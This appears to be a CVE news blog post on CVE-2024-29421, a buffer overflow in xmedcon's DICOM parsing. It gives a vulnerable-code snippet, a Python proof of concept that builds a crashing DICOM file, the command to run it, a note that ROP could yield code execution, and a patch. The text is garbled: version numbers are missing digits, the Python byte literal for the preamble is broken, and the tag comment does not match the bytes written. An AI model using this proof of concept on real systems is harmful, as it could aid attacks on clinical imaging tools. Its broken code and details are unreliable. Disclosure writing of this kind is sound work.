CVE CyberSecurity Database News

CVE-2024-29421 - Buffer Overflow in xmedcon .23. (libs/dicom/basic.c) – Details, Exploit, and Patch

Poster -

CVE-2024-29421 is a critical buffer overflow vulnerability discovered in xmedcon versions up to .23., specifically in the file libs/dicom/basic.c. If exploited, this flaw lets attackers execute arbitrary code by supplying a crafted DICOM file. The bug is patched in xmedcon .24.. This post explains the bug, demonstrates the exploit, and provides ways to stay safe.

What is xmedcon?

xmedcon is an open-source medical image conversion toolkit, used by clinicians and researchers. It supports reading, converting, and handling medical imaging formats like DICOM, Analyze, ECAT, and others.

The Vulnerability

In xmedcon .23. and earlier, a buffer overflow exists in libs/dicom/basic.c. The bug happens while parsing DICOM files. An attacker can supply a specially crafted DICOM file with data that overruns a fixed-size buffer, corrupting memory and potentially gaining control over the program.

CVE Page: NVD Entry for CVE-2024-29421

Upstream fix: xmedcon-.24. Release Notes

Where is the Bug?

The problem is in parsing DICOM tags, especially while reading input fields into static arrays without checking the length.

Vulnerable code in libs/dicom/basic.c

char buffer[64]; // fixed-size buffer

/* ... */

fread(buffer, 1, length, dicom_file); // no check if length > 64

This code reads length bytes into buffer, whose max size is 64. If length is set high in the DICOM file, it will overflow buffer, overwriting memory beyond it.

Exploit Example

If you control the DICOM input, you can set the field that decides length to a value > 64. The overflow overwrites adjacent stack memory. With careful data, attackers can overwrite the return address and point execution to malicious code.

Example Python script to create malicious DICOM

# Make a DICOM file with an oversized element to trigger the bug

with open('crash.dcm', 'wb') as f:
    # Write DICOM preamble
    f.write(b'\' * 128)
    f.write(b'DICM')

    # Add a tag (for example, Patient Name) with a long value
    f.write(b'\x10\x00\x10\x00')   # (001,001) Tag
    f.write(b'PN')                 # VR - Person Name
    f.write(b'\xFF\x00')           # Length (255 bytes)
    f.write(b'A'*255)              # Data: 255 'A's, which will overflow buffer[64]

Run xmedcon against this file and see a crash (segmentation fault). With advanced exploitation (e.g., ROP), this could be turned into code execution.

Run xmedcon with the bad file

xmedcon crash.dcm

This should crash the program. In some settings, you can gain arbitrary code execution.

The flaw is fixed in xmedcon .24.. The patch adds proper length checks

if (length > sizeof(buffer)) {
    /* handle error, prevent overflow */
}
fread(buffer, 1, length, dicom_file);

Upgrade now: Download latest xmedcon here

References and Further Reading

- CVE-2024-29421 on NIST NVD
- xmedcon .24. Release Notes
- DICOM Standard Intro
- How Buffer Overflows Work (simple explanation)

Final Words

CVE-2024-29421 shows how critical it is to validate file inputs, especially when handling medical data formats like DICOM. Always keep your conversion and analysis tools up to date. If you process files from outside your organization, be extra cautious.

Timeline

Published on: 05/22/2024 18:15:09 UTC
Last modified on: 08/19/2024 18:35:07 UTC